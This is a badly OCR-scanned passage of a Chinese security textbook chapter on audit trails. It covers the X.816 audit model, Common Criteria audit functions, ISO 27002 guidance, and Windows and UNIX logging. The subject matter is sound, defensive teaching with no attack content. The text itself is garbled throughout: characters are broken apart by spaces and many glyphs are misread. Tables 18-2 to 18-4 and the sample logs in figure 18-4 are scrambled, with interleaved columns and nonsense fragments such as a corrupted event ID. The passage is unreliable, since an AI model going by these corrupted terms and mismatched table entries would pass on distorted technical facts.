体系 结构 的 整体 概况 及 其 与 人 侵 检测 相关 活动 的 关系 。 接 下 来 ， 讨 论 审 计 迹 (也 称 为 审计 日 志 
578] 的 各 个 方面 的 内 容 。 最 后 ， 讨 论 审 计数 据 的 分 析 。 


18.1 安全 审计 体系 结构 


这 一 节 我 们 从 分 析 构 成 安全 审计 体系 结构 的 组 件 开始 来 讨论 安全 审计 。 首 先 ， 我 们 研究 一 
种 更 广泛 意义 下 的 安全 审计 模型 。 然 后 再 考察 安全 审计 的 详细 分 类 。 
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© [NIST95] 指出 ， 一 些 安 全 专家 对 审计 迹 和 审计 日 志 进 行 了 如 下 的 区 分 : 日 志 是 由 一 个 特定 的 软件 程序 包 生 
成 的 事件 的 记录 ， 而 审计 迹 是 一 个 事件 的 整个 历史 ， 可 能 使 用 多 个 日 志 进 行 记录 。 但 是 ， 安 全 共同 体 
(security community) 通常 不 使 用 此 定义 。 我 们 在 本 书 中 也 不 作 区 分 。 
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18.1.1 安全 审计 和 报警 模型 


ITU-TS 推 荐 标准 X.816 提出 了 一 种 模型 ， 该 模型 给 出 了 安全 审计 功能 的 组 件 ， 以 及 这 些 
组 件 与 安全 报警 之 间 的 关系 。 图 18-1 描 
述 了 该 模型 。 其 中 的 关键 组 件 如 下 : 
o 事件 鉴别 器 (event discriminator) : 
事件 鉴别 器 被 逻辑 地 租 和 到 系统 的 
软件 中 ， 它 监控 系统 活动 并 检测 为 
了 检测 而 配置 的 安全 相关 事件 。 
o 审计 记录 器 (audit recorder): 对 每 
个 检测 到 的 事件 ， 事 件 鉴别 器 将 
信息 传输 到 审计 记录 器 。 该 模型 
以 消息 的 形式 描述 此 传输 。 通 过 
记录 共享 内 存 区 域 中 的 事件 ， 其 
也 可 用 于 审计 。 
报警 处 理 器 (alarm processor): 事 
件 鉴别 器 检测 到 的 某 些 事 件 被 定义 
为 报警 事件 。 对 这 样 的 事件 ， 将 报 
警 通知 给 报警 处 理 器 。 报 警 处 理 器 图 18-1 安全 审计 和 报警 模型 (X.816 ) 
基于 该 报警 采取 一 些 动 作 。 该 动作 自身 是 可 审计 事件 ， 并 因此 被 传输 到 审计 记录 器 。 
e 安全 审计 迹 (security audit trail): 审计 记录 器 为 每 个 事件 创建 格式 化 的 记录 并 将 其 存储 
在 安全 审计 迹 中 。 
o 审计 分 析 器 (audit analyzer); 安全 审计 迹 对 审计 分 析 器 来 说 是 十 分 有 用 的 ， 审 计 分 析 器 
基于 活动 模式 ， 可 以 定义 新 的 可 审计 事件 并 将 其 发 送 到 审计 记录 器 ， 还 可 能 会 生成 报警 。 
o 审计 存档 器 (audit archiver): 这 是 一 个 软件 模块 ， 它 定期 从 审计 迹 中 提取 记录 创建 可 审 
计 事 件 的 一 个 永久 的 存档 。 
o 存档 (archive): 审计 存档 是 在 此 系统 上 与 安全 相关 的 事件 的 永久 存储 。 
审计 提供 器 (audit provider): 审计 提供 器 是 一 个 应 用 程序 或 审计 迹 的 用 户 接口 。 
o 审计 迹 检查 器 ( audit trail examiner): 审计 迹 检查 器 是 一 个 应 用 程序 或 用 户 ， 出 于 计算 
机 取证 和 其 他 分 析 的 目的 ， 检 查 审计 迹 和 审计 存档 的 历史 趋势 。 
o 安全 报告 (security report): 审计 迹 检查 器 准备 的 人 工 可 读 的 (human-readable) 安全 报告 。 
该 模型 说 明了 审计 功能 和 报警 功能 之 间 的 关系 。 审 计 功能 建立 了 安全 管理 员 定 义 的 与 安全 
相关 的 事件 记录 。 这 些 事件 中 的 某 些 事件 可 能 实际 上 违反 了 安全 的 规定 ， 或 者 被 怀疑 违反 了 安 
全 的 规定 。 这 样 的 事件 通过 报警 方式 输入 到 人 侵 检 测 系统 或 防火 墙 系统 。 
与 人 侵 检 测 技术 一 样 ， 分 布 式 的 审计 功能 建立 一 个 中 央 存 储 库 ， 这 对 分 布 式 系 统 是 非常 有 
用 的 。 分 布 式 审计 服务 需要 两 个 额外 的 逻辑 组 件 (如 图 18-2 所 示 )。 
o 审计 迹 收集 器 ( audit trail collector): 中 央 系 统 的 一 个 模块 ， 用 于 从 其 他 系统 收集 审计 
迹 记 录 ， 并 生成 一 个 组 合 的 审计 迹 。 
o 审计 调度 器 (audit dispatcher): 用 于 从 本 地 系统 到 中 央 审 计 迹 收集 器 传输 审计 迹 记 录 的 
模块 。 
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图 18-2 分布 式 审 计 迹 模型 (X.816 ) 


18.1.2 ”安全 审计 功能 

安全 审计 功能 的 另外 一 种 详细 分 类 也 是 非常 有 用 的 ， 这 种 分 类 已 经 发 展 成 为 通用 标准 规范 
(Common Criteria specification) [CCPS12a] 的 一 部 分 。 图 18-3 显示 了 安全 审计 被 分 解 成 6 个 主 
要 方面 ， 每 个 方面 包含 一 个 或 多 个 特定 的 功能 。 这 六 个 方面 包括 : 
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图 18-3 ”安全 审计 类 分 解 的 通用 标准 
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o 数据 生成 (data generation): 标识 审计 级 别 ， 枚 举 可 审计 事件 的 类 型 ， 并 标识 所 提供 的 
与 审计 相关 的 信息 的 最 小 集 。 该 功能 还 必须 处 理 安全 和 隐私 之 间 的 冲突 ， 并 为 那些 事 
件 指 定 ， 与 动作 相关 的 用 户 的 身份 应 该 包含 在 为 事件 生成 的 数据 中 。 

o 事件 选择 (event selection): 在 可 审计 集中 ， 选 定 或 排除 一 些 事 件 。 这 样 可 以 使 系统 配 
置 不 同 级 别 的 粒度 ， 以 避免 产生 难以 使 用 的 审计 迹 。 

© 事件 存储 (event storage): 创建 和 维护 安全 审计 迹 。 存 储 功能 包括 提供 可 用 性 并 防止 审 
计 迹 的 数据 丢失 的 技术 措施 。 

© 自动 响应 (automatic response): 事件 检测 表明 存在 一 个 潜在 的 安全 违规 ， 自 动 响应 定 
义 应 采取 的 反应 。 

e 审计 分 析 (audit analysis): 在 搜索 安全 违规 中 ， 提 供 自动 化 的 机 制 来 分 析 系 统 活动 和 审 
计数 据 。 该 组 件 标 识 可 审计 事件 集 ， 这 些 事件 的 发 生 或 累积 发 生 表明 有 潜在 的 安全 违 
规 。 对 于 这 样 的 事件 进行 分 析 是 为 了 确定 是 否 已 发 生 安全 违规 ; 这 种 分 析 使 用 异常 检 
测 和 启发 式 攻 击 (attack heuristic) 方法 。 

e 审计 复核 (audit review) : 对 于 已 经 被 授权 的 用 户 ， 可 用 于 帮助 对 审计 数据 的 审核 。 审 
计 复 核 组 件 可 能 包含 一 个 可 选 的 复核 功能 ， 能 够 根据 单个 标准 或 多 个 具有 逻辑 关系 的 
标准 执行 搜索 ， 对 审计 数据 进行 排序 ， 以 及 在 复核 之 前 对 审计 数据 进行 筛选 。 审 计 复 
核 仅 限 于 授权 的 用 户 。 


18.1.3 ÆR 


回顾 图 18-1 和 图 18-3 所 显示 的 功能 ， 可 以 形成 进行 安全 审计 的 需求 集合 。 第 一 个 需求 是 
事件 定义 ( event definition)。 安 全 管理 员 必 须 定义 容易 受到 审计 的 事件 集 。 下 一 节 会 详细 讨论 
这 个 问题 。 这 里 仅 给 出 一 个 由 [CCPS12a] 提供 的 列表 : 

e 将 与 安全 相关 的 软件 部 分 内 的 对 象 引 入 主体 的 地 址 空间 。 

e 对 象 的 删除 。 

© 访问 权限 或 功能 的 分 发 或 撤销 。 

e 主体 或 对 象 安全 属性 的 改变 。 

e 作为 主体 请 求 的 一 个 结果 ， 由 安全 软件 执行 的 策略 检查 。 

© 使 用 访问 权限 绕 过 策略 检查 。 

e 识别 和 身份 认证 功能 的 使 用 。 

e 由 一 个 操作 员 或 授权 用 户 采 取 的 与 安全 相关 的 动作 (例如 ， 一 个 保护 机 制 的 禁用 )。 

e 可 移动 介质 (例如 ， 打 印 输出 、 磁 带 、 磁 盘 ) 数据 的 导入 和 导出 。 

第 二 个 需求 是 ， 在 应 用 程序 和 系统 软件 中 必须 有 适当 的 钩子 (hook) 是 可 用 的 ， 以 激活 事件 
检测 (event detection)。 需 要 将 监控 软件 添加 到 系统 并 且 安 置 在 适当 的 位 置 ， 以 捕获 相关 的 活动 。 

下 一 步 的 需求 是 事件 记录 (event recording) 的 功能 ， 其 中 包括 需要 提供 安全 的 存储 ， 能 抵 
抗 不 被 算 改 或 删除 。 利 用 事件 和 审计 迹 分 析 软 件 、 工 具 和 接口 处 理 所 收集 到 的 数据 。 

另外 一 个 需求 是 审计 功能 的 安全 性 ( security of the auditing function)。 不 仅 审计 迹 ， 而 且 
所 有 审计 软件 和 中 介 存 储 必须 受到 保护 ， 使 之 不 会 被 绕 过 或 被 算 改 。 最 后 ， 审 计 系 统 应 具有 功 
能 影响 最 小 化 (minimal effect on functionality) 的 能 力 。 


18.1.4 ”实施 指南 
ISO 9 标准 信息 安全 管理 实施 细则 (ISO 27002) 为 审计 功能 的 实现 提供 了 一 组 有 用 的 指 


O ”国际 标准 化 组 织 。 请 参阅 附录 C 中 有 关 该 组 织 和 其 他 标准 制定 组 织 的 讨论 。 


412. FAR 管理 问题 


导 原 则 : 

1. 审计 需求 应 该 与 适当 的 管理 保持 一 致 。 

2. 检查 的 范围 应 该 被 认可 和 能 被 控制 。 

3. 检查 应 该 被 限制 为 对 软件 和 数据 的 只 读 访问 。 

4. 访问 只 读 权限 之 外 的 系统 文件 ， 应 该 只 被 允许 访问 其 被 隔离 的 副本 ， 审 计 完 成 时 副本 应 
被 删除 ， 如 果 审 计 文 档 编制 需要 保留 这 些 文件 ， 那 就 要 对 其 进行 适当 的 保护 。 

5. 执行 检查 的 资源 应 被 明确 地 标识 并 使 其 可 用 。 

6. 特殊 或 额外 的 处 理 需 求 应 被 标识 并 被 认可 。 

7. 所 有 访问 应 被 监控 和 记录 并 生成 参考 (reference) 迹 ; 带 时 间 稚 的 参考 迹 的 使 用 应 考虑 
关键 数据 或 系统 。 

8. 所 有 过 程 、 需 求 和 职责 应 形成 记录 文档 。 

9. 执行 审计 的 人 员 应 该 是 独立 于 审计 活动 的 。 


18.2 ”安全 审计 迹 
审计 迹 维护 着 系统 活动 的 记录 。 这 一 节 我 们 讨论 与 审计 迹 相关 的 问题 。 


18.2.1 收集 什么 数据 


收集 数据 的 选择 是 由 大 量 的 需求 决定 的 。 一 个 问题 是 要 收集 的 数据 量 ， 这 要 由 相关 区 域 的 
范围 和 数据 集 的 粒度 确定 。 此 外 ， 数 量 和 效率 之 间 有 一 个 权衡 。 收 集 的 数据 越 多 ， 系 统 性 能 就 
下 降 越 多 。 大 量 的 数据 也 可 能 会 对 用 于 检查 和 分 析 数 据 的 各 种 算法 造成 不 必要 的 负担 。 此 外 ， 
这 些 数据 的 存在 会 导致 安全 报告 的 内 容 过 多 或 页 数 过 长 。 

除了 应 注意 以 上 这 些 外 。 商 业 安 全 审计 迹 设 计 的 第 一 步 是 选择 要 捕获 的 数据 项 。 其 中 
包括 : 

与 审计 软件 的 使 用 相关 的 事件 ( 即 图 18-1 中 的 所 有 组 件 )。 

e 系统 上 与 安全 机 制 相关 的 事件 。 

e 为 各 种 安全 检测 和 防护 机 制 收集 的 所 有 事件 ， 其 中 包括 与 人 侵 检测 相关 的 项 目 (例如 ， 
K 8-2) 和 与 防火 墙 操作 相关 的 项 目 (如 表 9-3 和 表 9-4 )。 

与 系统 管理 和 操作 相关 的 事件 。 

对 操作 系统 的 访问 (例如 ， 通 过 系统 调用 )。 

对 选 定 应 用 程序 的 访问 。 

e 远程 访问 。 

ER 18-2 中 显示 的 一 个 实例 是 X.816 中 建议 的 审计 项 目的 列表 。 这 个 标准 指出 正常 和 
异常 条 件 都 需要 被 审计 ， 例 如 每 个 连接 请 求 ， 如 TCP 连接 请 求 ， 它 可 能 是 安全 审计 迹 记 录 
的 一 个 主体 ， 无 论 请 求 是 否 异常 ， 也 不 管 请 求 是 否 被 接受 ， 都 要 接受 审计 。 这 是 重要 的 一 
点 。 审 计数 据 的 收集 超出 了 生成 安全 报警 或 为 防火 墙 模块 提供 输入 的 要 求 。 数 据 表示 行为 不 
触发 报警 可 用 于 确定 正常 和 异常 使 用 模式 ， 并 因此 作为 人 侵 检测 分 析 的 输入 。 而 且 ， 在 攻击 
事件 中 ， 对 系统 上 所 有 活动 的 分 析 可 能 是 诊断 攻击 需要 的 ， 也 是 为 将 来 取得 合适 的 对 策 所 需 
要 的 。 

另 一 个 对 可 审计 事件 有 用 的 列表 是 包含 在 ISO 27002 中 的 列表 ( 见 表 18-3 )。 与 X.816 一 
FE, ISO 标准 详细 讲述 了 授权 和 未 经 授权 的 事件 ， 以 及 会 影响 系统 安全 功能 的 事件 。 
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R 18-2 在 X.816 中 建议 的 审计 项 目 








与 特定 连接 相关 的 安全 事件 在 单独 的 安全 服务 方面 ， 下 面 与 安全 相关 的 事件 非常 重要 : 
- 连接 请 求 -身份 认证 : 验证 成 功 

-连接 确认 -身份 认证 : 验证 失败 

- 断 开 连 接 请 求 -访问 控制 : 决定 访问 成 功 

- 断 开 确认 -访问 控制 : 决定 访问 失败 

-连接 的 统计 附属 信息 -不 可 和 否认 性 : 不 可 否认 的 消息 的 原始 位 置 
与 安全 服务 的 使 用 相关 的 安全 事件 -不 可 否认 性 : 不 可 否认 的 消息 的 收据 
-安全 服务 请 求 -不 可 否认 性 : 失败 的 事件 抵赖 

- 安全 机 制 使 用 -不 可 否认 性 : 成 功 的 事件 抵赖 

-安全 报警 -完整 性 : 盾牌 (shield) 的 使 用 

与 管理 有 关 的 安全 事件 -完整 性 : 无 盾牌 的 使 用 

-管理 操作 -完整 性 : 验证 成 功 

-管理 通知 - 完整 性 : 验证 失败 

应 至 少 包 括 的 审计 事件 列表 - 机密 性 : 隐藏 的 使 用 

-拒绝 访问 -机 密 性 : 显示 的 使 用 

-身份 验证 -审计 : 选择 进行 审计 的 事件 

-更 改 属性 -审计 : 取消 所 选 事 件 的 审计 

-创建 对 象 -审计 : 更 改 审计 事件 的 选择 标准 

— 删除 对 象 

- 修改 对 象 


- 使 用 特权 


表 18-3 ISO 27002 中 建议 的 监控 区 域 


授权 访问 ， 包 括 详细 信息 ， 如 : 系统 报警 或 失败 ， 如 : 

1) HP D 1) 控制 台 报警 或 消息 

2 ) 关键 事件 的 日 期 和 时 间 2) 系统 日 志 异 常 

3 ) 事件 的 类 型 3 ) 网 络 管理 报警 

4) 被 访问 的 文件 4) 访问 控制 系统 引发 的 报警 

5 ) 使 用 的 程序 /实用 工具 更 改 或 试图 更 改 系统 安全 设置 和 控制 措施 
所 有 特权 操作 ， 如 : 


1 ) 使 用 特权 账户 (例如 主管 、root、 管 理 员 ) 

2) 系统 启动 和 停止 

3) VO 设备 联结 (attachment) /分离 (detachment) 
未 经 授权 的 访问 尝试 ， 如 : 

1 ) 失败 或 被 拒绝 的 用 户 动作 

2 ) 涉及 数据 和 其 他 资源 的 失败 或 被 拒绝 的 动作 
3 ) 网 关 和 防火 墙 的 访问 策略 冲突 和 通知 

4) 专用 入 侵 检测 系统 的 报警 


由 于 安全 管理 员 需 要 设计 审计 数据 的 收集 策略 ， 为 了 选择 要 收集 的 数据 项 ， 将 审计 迹 进 行 
分 类 是 非常 有 用 的 。 在 下 文中 ， 我 们 将 介绍 对 审计 迹 设 计 有 用 的 分 类 。 

系统 级 审计 迹 ”系统 级 审计 迹 通常 用 于 监控 和 优化 系统 性 能 ， 但 也 可 以 提供 安全 审计 功 
能 。 系 统 加 强 了 安全 策略 的 某 些 方面 ， 例 如 访问 系统 本 身 。 系 统 级 审计 迹 应 捕获 相关 数据 ， 如 
成 功 和 失败 的 登录 尝试 、 使 用 的 设备 和 执行 的 操作 系统 功能 。 其 他 系统 级 功能 也 可 能 是 审计 感 
兴趣 的 ， 如 系统 操作 和 网 络 性 能 指示 器 。 

源 自 [NITS95] 的 图 18-4a 是 UNIX 系统 上 系统 级 审计 迹 的 一 个 实例 。shut down 命令 终止 
所 有 进程 并 使 系统 采用 单 用 户 模式 。Su 命令 创建 一 个 UNIX shell. 

应 用 级 审计 迹 ”应 用 级 审计 迹 可 以 用 于 检测 应 用 程序 中 的 安全 违规 ， 或 检测 应 用 程序 与 系 
统 交 互 的 缺陷 。 对 于 关键 的 应 用 或 与 敏感 数据 有 关 的 应 用 ， 应 用 级 审计 迹 可 以 提供 所 需 级 别 的 
细节 来 评估 安全 威胁 及 其 影响 。 例 如 ， 对 于 电子 邮件 应 用 ， 审 计 迹 可 以 记录 发 件 人 和 收 件 人 、 
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邮件 大 小 和 附件 的 类 型 。 对 于 使 用 结构 化 查询 语言 ( 即 SQL) 进行 的 数据 库 交 互 审 计 迹 可 以 记 
录用 户 、 事 务 类 型 ， 甚 至 单个 表 、 行 、 列 的 类 型 ， 或 者 访问 的 数据 项 。 
图 18-4b 是 一 个 邮件 投递 系统 的 应 用 程序 级 审计 迹 的 实例 。 


login: ROOT LOGIN console 
shutdown: reboot by root 
login: ROOT LOGIN console 
reboot: rebooted by root 
su: 


‘su root! succeeded for userl on /dev/ttyp0 


shutdown: reboot by userl . 
su: 'su root' succeeded for userl on /dev/ttypl 


su: 


'su root! succeeded for userl on /dev/ttypl 


date: set by userl 


su: 


‘su root' succeeded for userl on /dev/ttyp0 





11:20:22 
11:20:22 
11:59:51 
11:59:52 
12:43:52 
12:43:53 


a) 显示 认证 消息 的 系统 日 志文 件 实例 


AA06370: 
AA06370: 
AA06436: 
AA06436: 
AA06441: 
RAR06441: 


from=<user2@host2>, size=3355, class=0 
to=<userl@hostl>, delay=00:00:02,stat=Sent 
from=<user4@host3>, size=1424, class=0 
to=<userlGhostl>, delay=00:00:02, stat=Sent 
from=<user2@host2>, size=2077, class=0 
to=<userl@hostl>, delay=00:00:01, stat=Sent 





b) 邮件 投递 系统 的 应 用 程序 级 审计 记录 


secs Fri Apr 8 
secs Fri Apr 8 
secs Fri Apr 8 
secs Fri Apr 8 
secs Fri Apr 8 


secs Fri Apr 8 
secs Fri Apr 8 
secs Fri Apr 8 
secs Fri Apr 8 
secs Fri Apr 8 





输入 也 是 有 用 的 。 


c) 显示 用 户 执行 命令 顺序 列表 的 用 户 日 志 


图 18-4 审计 迹 实 例 


用 户 级 审计 迹 ”用 户 级 别 的 审计 迹 依据 时 间 顺 序 记录 单个 用 户 的 活动 。 它 可 用 于 指出 用 户 
对 自己 动作 所 负 的 责任 。 这 样 的 审计 迹 ， 对 于 作为 试图 定义 相对 于 异常 的 正常 行为 分 析 程 序 的 


一 个 用 户 级 审计 迹 可 以 记录 用 户 与 系统 的 交互 ， 如 发 出 的 命令 、 尝 试 的 用 户 识 别 和 认证 的 
次 数 、 访 问 的 文件 和 资源 。 审 计 迹 也 可 以 捕获 用 户 对 应 用 程序 的 使 用 信息 。 

图 18-4c 是 一 个 在 UNIX 系统 上 的 用 户 级 审计 迹 实例 。 

物理 访问 审计 迹 ”物理 访问 审计 迹 可 以 由 控制 物理 访问 的 设备 生成 ， 然 后 传送 到 一 个 中 央 
主机 以 供 后 续 的 存储 和 分 析 。 实 例 有 电子 钥匙 ( card-key) 系统 和 报警 系统 。[NIST95] 列 出 以 


下 相关 数据 类 型 的 实例 ; 


© 应 记录 尝试 访问 的 日 期 和 时 间 ， 也 要 记录 尝试 或 进行 访问 所 经 过 的 门 ( gate or door) 和 
个 人 用 户 (RAP ID). 

© 无 效 尝试 应 通过 非 计算 机 的 审计 迹 进 行 监控 和 记录 ， 就 像 它们 是 计算 机 系统 审计 迹 一 
样 。 管 理应 该 注意 是 否 有 人 在 未 经 授权 的 时 间 内 试图 进行 访问 。 

e 记录 的 信息 还 应 包括 试图 添加 、 修 改 或 删除 的 物理 访问 权限 〈 例 如 ， 授 权 一 个 新 雇员 
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进入 该 建筑 物 或 授权 换 岗 的 职员 进入 他 们 的 新 办 公 室 ， 并 且 如 果 可 行 的 话 ， 当 然 要 删 
除 他 们 的 旧 访 问 权 限 )。 

® 与 系统 和 应 用 程序 审计 迹 一 样 ， 非 计算 机 的 审计 功能 可 以 实现 将 消息 发 送 给 安全 管理 
人 员 ， 指 明 对 受 控制 的 空间 有 效 或 无 效 的 访问 尝试 。 为 了 不 降低 监控 器 的 敏感 性 ， 所 
有 访问 应 不 以 消息 的 形式 发 送 到 显示 屏 。 如 果 发 生 例外 情况 ， 如 失败 的 访问 尝试 ， 在 
监控 访问 中 应 被 突出 显示 。 


18.2.2 ”保护 审计 迹 数 据 


RFC 2196 (网 站 安全 手册 ) 列 出 了 用 于 存储 审计 迹 的 三 种 备 选 方案 : 

e 在 主机 上 读 / 写 文件 。 

e 一 次 写 和 信 /多 次 读 取 设备 (例如 ，CD-ROM 或 DVD-ROM)。 

e 只 写 的 设备 (例如 ， 一 个 行 式 打 印 机 )。 

文件 系统 日 志文 件 是 比较 容易 配置 的 ， 且 占用 的 资源 最 少 。 记 录 可 以 立即 被 访问 ， 这 对 对 
抗 正在 进行 的 攻击 非常 有 用 。 但 是 ， 这 种 方法 特别 容易 受到 攻击 。 如 果 攻 击 者 获得 对 系统 的 访 
问 特 权 ， 则 审计 迹 很 容易 被 修改 或 被 删除 。 

CD-ROM 或 类 似 的 存储 方法 更 安全 ， 但 不 太 方便 。 该 方法 需要 一 个 稳定 的 可 写 和 人 的 介质 。 
访问 可 能 会 被 延迟 且 不 可 立即 使 用 。 

打印 的 日 志 提 供 纸 制 的 审计 迹 ， 但 无 法 在 大 的 系统 或 网 络 系统 上 实际 应 用 于 捕获 详细 的 审 
计数 据 。RFC 2196 建议 ， 当 需要 永久 的 、 立 即 可 用 的 日 志 时 ， 即 使 系统 崩 涡 ， 纸 质 日 志 也 是 
非常 有 用 的 。 

审计 迹 的 保护 同时 涉及 完整 性 和 机 密 性 。 完 整 性 特别 重要 ， 因 为 入侵 者 可 能 试图 通过 更 改 
审计 迹 而 删除 入 侵 证 据 。 对 于 文件 系统 日 志 ， 可 能 的 确保 完整 性 的 最 佳 方法 是 数字 签名 。 一 次 
写 人 设备 ， 如 CD-ROM 或 纸张 自动 提供 完整 性 。 加 强 的 访问 控制 是 另 一 个 提供 完整 性 的 方法 。 

如 果 审 计 迹 包含 用 户 信 息 则 机 密 性 非常 重要 ， 这 些 信息 很 敏感 并 且 不 能 透露 给 所 有 用 户 ， 
如 有 关 工 资 改动 或 工资 等 级 状况 的 信息 。 在 这 方面 加 强 访问 控制 能 起 到 帮助 作用 。 一 种 有 效 的 
措施 是 对 称 加 密 ( 例 如 ， 使 用 AES (高 级 加 密 标准 ) 或 三 重 DES (数据 加 密 标准 ))。 必 须 保护 
好 密 钥 ， 仅 可 供 审计 迹 软件 和 后 续 审 计 分 析 软 件 使 用 。 

注意 ， 完 整 性 和 机 密 性 措施 不 仅 保护 本 地 存储 的 审计 迹 数据 ， 而 且 还 保护 向 中 央 存 储 库 传 
输 过 程 中 的 审计 迹 数据 。 


18.3 ”实现 日 志 功 能 


安全 审计 工具 的 基础 是 审计 数据 的 初始 捕获 。 这 要 求 该 软件 包括 钩子 hook) 或 者 捕获 
点 ， 一 且 预 先 选 定 的 事件 发 生 ， 则 触发 数据 的 收集 和 存储 。 这 样 的 审计 数据 收集 或 日 志 功能 依 
赖 于 审计 软件 的 特性 ， 也 随 着 所 采用 的 操作 系统 及 所 涉及 的 应 用 程序 而 变化 。 本 节 我 们 考察 系 
统 级 和 用 户 级 审计 迹 日 志 功 能 的 实现 方法 ; 同时 ， 我 们 也 考察 应 用 程序 级 审计 迹 的 日 志 功能 的 
实现 方法 。 


18.3.1 系统 级 日 志 功 能 


系统 级 的 大 部 分 日 志 功 能 可 以 使 用 作为 操作 系统 的 一 部 分 的 现 有 工具 实现 。 本 节 我 们 讨论 
Windows 操作 系统 中 的 工具 和 UNIX 操作 系统 中 的 系统 日 志 工具 (Syslog)。 

Windows 事件 日 志 Windows 事件 日 志 中 的 事件 是 描述 计算 机 系统 中 发 生 的 相关 事件 的 
实体 。 事 件 包 含 一 个 数字 标识 代码 、 一 组 属性 (任务 、 操 作 码 、 级 别 、 版 本 和 关键 字 )， 以 及 
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用 户 提供 的 可 选 数据 。 这 些 事件 信息 和 属性 由 发 布 者 以 XML 数据 或 二 进 制 数据 的 形式 传递 给 
事件 使 用 者 。Windows 配 有 三 种 类 型 的 事件 日 志 : 
© 系统 事件 日 志 (system event log): 该 工具 是 由 系统 服务 账户 (已 安装 系统 服务 ) 下 运 
行 的 应 用 程序 、 驱 动 程序 或 者 与 事件 与 计算 机 系统 运行 状况 相关 的 应 用 程序 或 组 件 使 
用 的 。 
© 应 用 程序 事件 日 志 (application event log): 记录 所 有 用 户 级 应 用 程序 的 事件 。 此 日 志 
不 受 保护 并 对 任何 应 用 程序 开放 。 记 录 扩 展 信 息 的 应 用 程序 应 该 定义 一 个 特殊 应 用 的 
日 志 。 
e 安全 事件 日 志 (security event log): 即 Windows 审计 日 志 。 此 事件 日 志 是 Windows 本 
地 安全 授权 ( Windows Local Security Authority) 独占 使 用 的 。 如 果 基 础 应 用 程序 支持 ， 
用 户 事件 可 以 作为 审计 对 象 。 
对 所 有 事件 日 志 或 审计 迹 ， 事 件 的 信息 可 以 以 XML 格式 存储 。 表 18-4 列 出 每 个 事件 信息 
的 存储 项 。 图 18-5 是 从 一 个 Windows 系统 事件 日 志 中 导出 的 数据 的 一 个 实例 。 


表 18-4 Windows 事件 架构 组 件 
LevelName WPP 的 调试 跟踪 域 ， 在 调试 通道 ( debug 


包含 二 进 制 数据 的 事件 的 属性 值 channel) 的 调试 事件 中 使 用 

Windows 事件 日 志 提供 的 二 进 制 数据 一 个 事件 被 呈报 的 级 别 

呈报 事件 被 发 布 的 通道 事件 的 严重 级 别 

事件 提供 器 为 一 个 参数 提供 的 复杂 数据 Peer en WPP 调试 跟踪 域 ， 在 调试 通道 的 调试 
调试 事件 中 使 用 的 ComponentName WPP 调试 跟踪 域 事件 呈报 的 事件 消息 

事件 发 生 所 在 的 计算 机 事件 所 呈报 的 操作 码 

两 个 128 位 值 ， 可 用 于 查找 相关 的 事件 活动 或 活动 的 点 ， 它 在 引发 该 事件 时 执行 该 应 用 程序 


事件 数据 被 处 理 时 导致 了 错误 的 事件 数据 项 的 名 称 定义 自动 化 事件 的 组 件 
由 事件 提供 器 提供 的 复杂 数据 类 型 的 一 部 分 所 构成 的 


上 有 关 发 布 该 事件 的 事件 提供 器 的 信息 

事件 提供 器 为 一 个 参数 提供 的 数据 发 布 被 呈报 事件 的 事件 发 布 者 

Windows 软件 跟踪 也 处 理 器 (WPP) 事件 的 属性 值 一 个 事件 被 呈报 的 信息 

在 处 理事 件数 据 出 错时 引发 的 错误 码 用 户 安全 标识 符 

描述 系统 中 发 生 的 一 些 有 趣事 件 信息 的 结构 化 片断 人 

2 SubComponentName WPP 调试 跟踪 域 ， 在 调试 通道 的 

事件 标识 号 调试 事件 中 使 用 

SS 当 该 事件 被 引发 或 被 保存 到 日 志文 件 时 ， 由 系统 自动 

填充 的 信息 

事件 数据 被 处 理 时 导致 的 错误 事件 的 二 进 制 事件 数据 | ”一 个 事件 将 显示 的 任务 

有 关 事 件 发 生 的 进程 和 线程 的 信息 使 用 符号 值 的 任务 
pristine WEP AR, EA A Geechee 


FlagsName WPP 调试 跟踪 域 ， 在 调试 通道 的 调试 事件 | ”提供 者 定义 的 部 分 ， 可 以 包含 任何 有 效 的 传递 事件 信 
中 使 用 息 的 XML 内容 
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( 续 ) 


KemelTime WPP 调试 跟踪 域 ， 在 调试 通道 的 调试 事件 | ”UserTime WPP 调试 跟踪 域 ， 在 调试 通道 的 调试 事件 中 


中 使 用 
显示 给 事件 的 关键 字 
事件 使 用 的 关键 字 





Event Type: Success Audit 
Event Source: Security 
Event Category: (1) 

Event ID: $17 

Date: 3/6/2006 
Time: 2:56:40 PM 


User: NT AUTHORITY\SYSTEM 

Computer: KENT 

Description: The audit log was cleared 

Primary User Name: SYSTEM Primary Domain: NT AUTHORITY 
Primary Logon ID: (0x0, 0x3F7) Client User Name: userk 

Client Domain: KENT Client Logon ID: (0x0, 0x28BFD) 





Æ 18-5 Windows 系统 日 志 项 实例 


Windows 允许 系统 用 户 在 9 个 不 同 的 活动 类 别 中 启用 审计 功能 : 

e 账户 登录 事件 ( account logon event): 从 系统 的 角度 看 ， 用 户 身 份 认 证 活动 可 以 对 尝试 

的 登录 进行 验证 。 实 例 : 认证 授权 ; 认证 票据 请 求 失败 ; 登录 时 的 账户 映射 ， 登 录 时 

账户 无 法 映射 。 此 类 别 中 的 个 体 活 动 是 不 需要 特别 说 明 的 ， 但 大 量 的 失败 可 能 表明 有 

扫描 活动 、 蛮 力 攻 击 单个 账户 活动 ， 或 者 自动 攻击 传播 活动 。 

账户 管理 (account management): 与 创建 、 管 理 、 删 除 单个 账户 和 用 户 组 有 关 的 管理 活 

动 。 实 例 : 创建 用 户 账户 ; 更 改 密码 尝试 ; 删除 用 户 账户 ; 启用 安全 的 全 局 组 成 员 添 加 ; 

域 策 略 更 改 。 

目录 服务 访问 (directory service access): 对 任何 活动 目录 对 象 的 用 户 级 访问 ， 这 个 对 象 

具有 定义 的 系统 访问 控制 列表 (SACL)。 一 个 系统 访问 控制 列表 创建 一 组 用 户 和 用 户 

组 ， 对 于 这 些 用 户 细 粒度 的 审计 是 必需 的 。 

e 登录 事件 ( logon event): 不 管 是 本 地 计算 机 还 是 网 络 ， 从 发 出 该 活动 的 系统 进行 的 用 
户 认证 活动 。 实 例 : 用 户 成 功 登 录 ; 登录 失败 ， 未 知 的 用 户 名 或 错误 口令 ; 登录 失败 ， 
因为 账户 被 禁用 ; 登录 失败 ， 因 为 账户 已 过 期 ; 登录 失败 ， 用 户 不 允许 登录 此 计算 机 ; 
用 户 注销 ; 登录 失败 ， 账 户 锁定 。 

© 对 象 访问 (object access): 对 拥有 已 定义 的 系统 访问 控制 列表 的 文件 系统 和 注册 表 对 象 
的 用 户 级 访问 。 提 供 了 一 种 相对 容易 的 方法 来 跟踪 与 操作 系统 集成 在 一 起 的 敏感 文件 
